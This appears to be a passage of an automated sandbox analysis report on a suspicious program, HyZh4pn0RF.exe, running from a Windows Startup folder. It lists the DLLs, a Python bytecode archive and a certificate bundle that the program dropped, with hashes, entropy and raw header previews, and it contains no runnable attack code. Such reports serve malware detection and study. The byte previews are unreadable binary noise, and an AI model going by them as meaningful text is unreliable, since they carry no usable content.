                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|../8z.|8z.|8z.|1.T|>z.|-..}:z.|-..}5z.|-..}0z.|-..};z.|...}:z.|8z.|.z.|s..}1z.|...}9z.|...}9z.|..8|9z.|...}9z.|Rich8z.|........PE..d......e.........." ...%.v...........-.......................................`............`.............................................P............@.......0.........../...P..........T...............................@............................................text....u.......v.................. ..`.rdata...x.......z...z..............@..@.data...H...........................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):124696
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.266006891462829
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:9PfqZRAWgyjwzCO4w5y3DUfUK8PtIAOQMo:oAWgKw2C5iSUv1
                                                                                                                                                                                                                                                                                                MD5:506B13DD3D5892B16857E3E3B8A95AFB
                                                                                                                                                                                                                                                                                                SHA1:42E654B36F1C79000084599D49B862E4E23D75FF
                                                                                                                                                                                                                                                                                                SHA-256:04F645A32B0C58760CC6C71D09224FE90E50409EF5C81D69C85D151DFE65AFF9
                                                                                                                                                                                                                                                                                                SHA-512:A94F0E9F2212E0B89EB0B5C64598B18AF71B59E1297F0F6475FA4674AE56780B1E586B5EB952C8C9FEBAD38C28AFD784273BBF56645DB2C405AFAE6F472FB65C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................}........................:...................:......:......:......:.....Rich...................PE..d.....e.........." ...%.............................................................d....`.........................................`o..P....o..................8......../.......... ...T...............................@............................................text............................... ..`.rdata..............................@..@.data...8............|..............@....pdata..8...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):177432
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.976892131161338
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:1CRW4ljuyKK8vZktW5No6XfJN54eNWXvM4VRJNI7IM/cbP7RHs3FJZ1IAC7+y:1mfEyKKaZo6XfJ2MSV+JZW
                                                                                                                                                                                                                                                                                                MD5:DDB21BD1ACDE4264754C49842DE7EBC9
                                                                                                                                                                                                                                                                                                SHA1:80252D0E35568E68DED68242D76F2A5D7E00001E
                                                                                                                                                                                                                                                                                                SHA-256:72BB15CD8C14BA008A52D23CDCFC851A9A4BDE13DEEE302A5667C8AD60F94A57
                                                                                                                                                                                                                                                                                                SHA-512:464520ECD1587F5CEDE6219FAAC2C903EE41D0E920BF3C9C270A544B040169DCD17A4E27F6826F480D4021077AB39A6CBBD35EBB3D71672EBB412023BC9E182A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wfj...9...9...9.n.9...9.i.8...9.i.8...9.i.8...9.i.8...9...8...9...9U..9.n.8...9...8...9...8...9...9...9...8...9Rich...9........PE..d.....e.........." ...%............\,..............................................t.....`......................................... ...d.......................8......../......x...@...T...............................@............................................text.............................. ..`.rdata...!......."..................@..@.data...(...........................@....pdata..8............^..............@..@.rsrc................j..............@..@.reloc..x............t..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25368
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.632343774086073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:wfo/nEWNkiAQ1IAZw/7HQIYiSy1pCQ+KGfAM+o/8E9VF0NyHGpn:wwnERHQ1IAZwD5YiSyvtkAMxkEMn
                                                                                                                                                                                                                                                                                                MD5:7A00FF38D376ABAAA1394A4080A6305B
                                                                                                                                                                                                                                                                                                SHA1:D43A9E3AA3114E7FC85C851C9791E839B3A0EE13
                                                                                                                                                                                                                                                                                                SHA-256:720E9B68C41C8D9157865E4DD243FB1731F627F3AF29C43250804A5995A82016
                                                                                                                                                                                                                                                                                                SHA-512:CE39452DF539EEEFF390F260C062A0C902557FDA25A7BE9A58274675B82B30BDDB7737B242E525F7D501DB286F4873B901D94E1CD09AA8864F052594F4B34789
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........pjzz#jzz#jzz#c..#hzz#..{"hzz#..."fzz#..~"bzz#..y"izz#P.{"hzz#!.{"ozz#jz{#@zz#P.r"kzz#P.z"kzz#P..#kzz#P.x"kzz#Richjzz#........PE..d......e.........." ...%.....&...... ........................................p......Mr....`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36632
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.357254511176439
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:6cxnHG7MYGQd0hHdzA77yeu1IACis5YiSyvoAMxkE9:6cxnm7M6dAHdzA77yeu1IACiW7Sy+xx
                                                                                                                                                                                                                                                                                                MD5:C1654EBEBFEEDA425EADE8B77CA96DE5
                                                                                                                                                                                                                                                                                                SHA1:A4A150F1C810077B6E762F689C657227CC4FD257
                                                                                                                                                                                                                                                                                                SHA-256:AA1443A715FBF84A84F39BD89707271FC11A77B597D7324CE86FC5CFA56A63A9
                                                                                                                                                                                                                                                                                                SHA-512:21705B991E75EFD5E59B8431A3B19AE5FCC38A3E7F137A9D52ACD24E7F67D61758E48ABC1C9C0D4314FA02010A1886C15EAD5BCA8DCA1B1D4CCBFC3C589D342E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............l..............................z.......................................z.......z.......z.......z......Rich....................PE..d......e.........." ...%.(...:.......&..............................................!n....`..........................................T..H....T...............p..`....`.../......t...DG..T............................C..@............@.......S..@....................text....&.......(.................. ..`.rdata..D....@... ...,..............@..@.data........`.......L..............@....pdata..`....p.......P..............@..@.rsrc................T..............@..@.reloc..t............^..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1332263
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.5864676354018465
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:uttcY+bStOmgRF1+fYNXPh26UZWAzCu7joqYnhjHgkVHdmmPnHz1dG6sF7aYceM:uttcY+UHCiCAd+cqHdmmPHzvwaYceM
                                                                                                                                                                                                                                                                                                MD5:630153AC2B37B16B8C5B0DBB69A3B9D6
                                                                                                                                                                                                                                                                                                SHA1:F901CD701FE081489B45D18157B4A15C83943D9D
                                                                                                                                                                                                                                                                                                SHA-256:EC4E6B8E9F6F1F4B525AF72D3A6827807C7A81978CB03DB5767028EBEA283BE2
                                                                                                                                                                                                                                                                                                SHA-512:7E3A434C8DF80D32E66036D831CBD6661641C0898BD0838A07038B460261BF25B72A626DEF06D0FAA692CAF64412CA699B1FA7A848FE9D969756E097CBA39E41
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):292541
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.048162209044241
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                                                                                                                                                                MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                                                                                                                                                                SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                                                                                                                                                                SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                                                                                                                                                                SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10752
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.674392865869017
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:KGUmje72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFXiHBpv9cX6gTim1qeSC:rjQ2HzzU2bRYoe1HH9cqgTimoe
                                                                                                                                                                                                                                                                                                MD5:D9E0217A89D9B9D1D778F7E197E0C191
                                                                                                                                                                                                                                                                                                SHA1:EC692661FCC0B89E0C3BDE1773A6168D285B4F0D
                                                                                                                                                                                                                                                                                                SHA-256:ECF12E2C0A00C0ED4E2343EA956D78EED55E5A36BA49773633B2DFE7B04335C0
                                                                                                                                                                                                                                                                                                SHA-512:3B788AC88C1F2D682C1721C61D223A529697C7E43280686B914467B3B39E7D6DEBAFF4C0E2F42E9DDDB28B522F37CB5A3011E91C66D911609C63509F9228133D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d....jAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):122880
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.917175475547778
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:bA3W6Fck6/g5DzNa4cMy/dzpd1dhdMdJGFEr6/vD:MW6NzcMy/d13FErgvD
                                                                                                                                                                                                                                                                                                MD5:BF9A9DA1CF3C98346002648C3EAE6DCF
                                                                                                                                                                                                                                                                                                SHA1:DB16C09FDC1722631A7A9C465BFE173D94EB5D8B
                                                                                                                                                                                                                                                                                                SHA-256:4107B1D6F11D842074A9F21323290BBE97E8EED4AA778FBC348EE09CC4FA4637
                                                                                                                                                                                                                                                                                                SHA-512:7371407D12E632FC8FB031393838D36E6A1FE1E978CED36FF750D84E183CDE6DD20F75074F4597742C9F8D6F87AF12794C589D596A81B920C6C62EE2BA2E5654
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d....jAe.........." ...%.:...........<.......................................0............`.........................................@...d.......................(............ ......P...................................@............P...............................text....8.......:.................. ..`.rdata...W...P...X...>..............@..@.data...8=.......0..................@....pdata..(...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5191960
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                                                                                MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                                                                                SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                                                                                SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                                                                                SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):39696
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                                                                MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                                                                SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                                                                SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                                                                SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):787224
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                                                                                MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                                                                                SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                                                                                SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                                                                                SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):199448
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.385263095268062
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:gP9/HQAYp/8IdzL37lqrEJesY7p7Ndrjt8HWcFwUT6ZIALhNn6:opFYp/vdzL3pqrEJ2xDrJ8DdT6A
                                                                                                                                                                                                                                                                                                MD5:F179C9BDD86A2A218A5BF9F0F1CF6CD9
                                                                                                                                                                                                                                                                                                SHA1:4544FB23D56CC76338E7F71F12F58C5FE89D0D76
                                                                                                                                                                                                                                                                                                SHA-256:C42874E2CF034FB5034F0BE35F7592B8A96E8903218DA42E6650C504A85B37CC
                                                                                                                                                                                                                                                                                                SHA-512:3464ECE5C6A0E95EF6136897B70A96C69E552D28BFEDD266F13EEC840E36EC2286A1FB8973B212317DE6FE3E93D7D7CC782EB6FC3D6A2A8F006B34F6443498DE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W,.6B..6B..6B..N..6B..IC..6B..IG..6B..IF..6B..IA..6B...C..6B..NC..6B..6C..6B...O..6B...B..6B......6B...@..6B.Rich.6B.........PE..d......e.........." ...%.............................................................)....`......................................... ...P...p............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata..D.... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):7009048
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7826778751744685
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:mz0oCxOqKWneF3o1VLCClOTNRpaOviXEYWyb3eOYTvuFsx/iac84YNFXiTlv5WF4:mooCcqKLHX+az2Ro8Kv7HDMiEB/
                                                                                                                                                                                                                                                                                                MD5:550288A078DFFC3430C08DA888E70810
                                                                                                                                                                                                                                                                                                SHA1:01B1D31F37FB3FD81D893CC5E4A258E976F5884F
                                                                                                                                                                                                                                                                                                SHA-256:789A42AC160CEF98F8925CB347473EEEB4E70F5513242E7FABA5139BA06EDF2D
                                                                                                                                                                                                                                                                                                SHA-512:7244432FC3716F7EF27630D4E8FBC8180A2542AA97A01D44DCA260AB43966DD8AC98B6023400B0478A4809AACE1A128F1F4D6E544F2E591A5B436FD4C8A9D723
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..e...e...e...d...e.......e...`...e...a...e...f...e.......e..d...e...d...e..Bh.M.e..Be...e..B....e..Bg...e.Rich..e.........................PE..d......e.........." ...%.$)..ZB......]........................................k.....:.k...`...........................................O.d...toP......Pj.......`.dZ....j../...`j.pZ....3.T.....................I.(...P.3.@............@)..............................text....")......$)................. ..`.rdata...T'..@)..V'..().............@..@.data....?....P......~P.............@....pdata..dZ....`..\....`.............@..@PyRuntim.....@c......\b.............@....rsrc........Pj......^i.............@..@.reloc..pZ...`j..\...hi.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):134656
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                                                                                                                MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                                                                                                                SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                                                                                                                SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                                                                                                                SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):30488
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.582548725691534
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:b9yLTFInPLnIdHqp3DT90IZIAQGyHQIYiSy1pCQ273bAM+o/8E9VF0Nypyn4:6inzUHqN1rZIAQGo5YiSyvUrAMxkEjh
                                                                                                                                                                                                                                                                                                MD5:8A273F518973801F3C63D92AD726EC03
                                                                                                                                                                                                                                                                                                SHA1:069FC26B9BD0F6EA3F9B3821AD7C812FD94B021F
                                                                                                                                                                                                                                                                                                SHA-256:AF358285A7450DE6E2E5E7FF074F964D6A257FB41D9EB750146E03C7DDA503CA
                                                                                                                                                                                                                                                                                                SHA-512:7FEDAE0573ECB3946EDE7D0B809A98ACAD3D4C95D6C531A40E51A31BDB035BADC9F416D8AAA26463784FF2C5E7A0CC2C793D62B5FDB2B8E9FAD357F93D3A65F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d......e.........." ...%.....2.......................................................y....`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
